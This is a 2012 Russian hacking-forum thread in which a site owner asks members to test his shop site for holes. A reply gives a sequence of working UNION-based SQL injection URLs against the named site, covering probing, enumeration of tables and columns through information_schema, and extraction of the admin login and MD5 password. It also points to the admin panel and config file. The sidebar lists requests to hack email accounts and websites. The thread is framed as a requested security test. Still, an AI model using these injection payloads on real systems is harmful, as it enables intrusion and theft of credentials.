CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Мастера, прошу проверить сайт.
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Тест на уязвимости RSS подписка на сообщения с форума Subscribe
Только для владельцев ресурсов - бесплатное тестирование на уязвимости

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 8902
Мастера, прошу проверить сайт.
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
ivapro


Novice
# | Сообщение добавлено 28.03.2012 09:56:55
Ребятки создали для меня сайт, как говорят, на собственном движке. Хочу проверить его "дырявость". Заранее спасибо за потраченное вами время. http://demo.comhd.ru/
Сказать спасибо Ответить Цитировать

.pascal




Silver Member
# | Сообщение добавлено 28.03.2012 11:32:49
Отредактировано 28.03.2012 11:35:48 by .pascal
Сайт дырявый как решето. Движок у них не свой а купленный за 500 рублей на одном из этих сайтов:
http://www.plati.ru/asp/pay.asp?id_d=46608
http://shop.webchess.ru/
 
На сайте есть SQL инъекции и XSS, при желании можно поиметь админку.
 
тест скули http://demo.comhd.ru/index.php?group=9999999%29+union+select+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8+%23
 
список таблиц http://demo.comhd.ru/index.php?group=9999999%29+union+select+1%2C2%2Ctable_name%2C4%2C5%2C6%2C7%2C8+from+information_schema.tables+%23
 
колонки таблицы shop_admins http://demo.comhd.ru/index.php?group=9999999%29+union+select+1%2C2%2Ccolumn_name%2C4%2C5%2C6%2C7%2C8+from+information_schema.columns+where+table_name%3D0x73686F705F61646D696E+%23
 
логин и md5-пасс админа http://demo.comhd.ru/index.php?group=9999999%29+union+select+1%2C2%2Clogin%2Clevel%2C5%2Cpassword%2C7%2C8+from+shop_admin+%23
 
админка сайта http://demo.comhd.ru/admin.php
конфиг http://demo.comhd.ru/config.php
 
--
Silence is golden...
Сказать спасибо Ответить Цитировать

ivapro


Novice
# | Сообщение добавлено 28.03.2012 14:44:41
Отредактировано 30.03.2012 23:22:30 by ivapro
Дыры вроде залатали. МАСТЕРА, продолжим ломку "штопанного" сайта? Заранее спасибо за потраченное время.
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...
  • Критическая уязвимость в Cosmos DB
  • Исследователи научились обходить PIN-коды для карт Mastercard и M...
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}